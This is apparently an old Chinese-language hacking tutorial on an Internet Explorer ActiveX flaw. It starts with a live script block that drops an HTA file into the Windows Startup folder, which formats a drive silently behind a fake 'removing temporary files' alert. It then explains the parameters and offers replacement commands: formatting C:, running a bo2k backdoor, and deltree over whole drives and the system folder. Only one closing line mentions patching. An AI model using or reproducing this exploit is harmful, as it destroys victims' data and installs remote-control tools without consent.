说明：输入javascript查询一下。点击右键可查看源文件。可根据源文件的格式加上更多关键字。

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\test.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('start /m format a: /autotest /u');alert('IMPORTANT : Windows is removing unused temporary files.');</"+"SCRIPT>";
scr.write();
</script>

这项技术是在没多久以前台湾所流行的攻击法，你知道利用漏洞的厉害在哪吗？

这一项教学就是利用微软( Microsoft )的IE浏览器( Internet Explorer )所衍生出来的
攻击方法。

教学开始∶

以下这段就是具有破坏性的HTML


Hacking Your Computer .

scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

(懂HTML的人应该就看得出来其中精随)

现在我大概来解释其中几个项目所写的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"

这一项就是指当你看到这网页它会写入到你的电脑启动目录底下，并命名为
hack.hta

wsh.Run('start.exe /m format c:/q /autotest /u');

通常要格式化硬碟都会先问你是否要执行，但其中的"/autotest"这项。

它是一个微软没有公开的功能，键入後format的动作便会被强制执行。

这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。

最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小
化的状态。

执行其他攻击指令的方法∶

只要修改“start.exe /m format c:/q /autotest /u”这一项便形。

start.exe /m format c:/q /autotest /u

其中的“c:”可以换做其他的硬碟。

(path)\bo2k.exe

执行它电脑中的某个程式，如果你有传bo2k到它电脑中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

杀掉对方硬碟底下所有的档案。

start.exe /m deltree /y c:\windows\system\*.*

杀掉对方c:\windows\system\目录底下的所有档案。

後叙∶

预防遭此手段的破坏就是到微软去更新你的浏览器。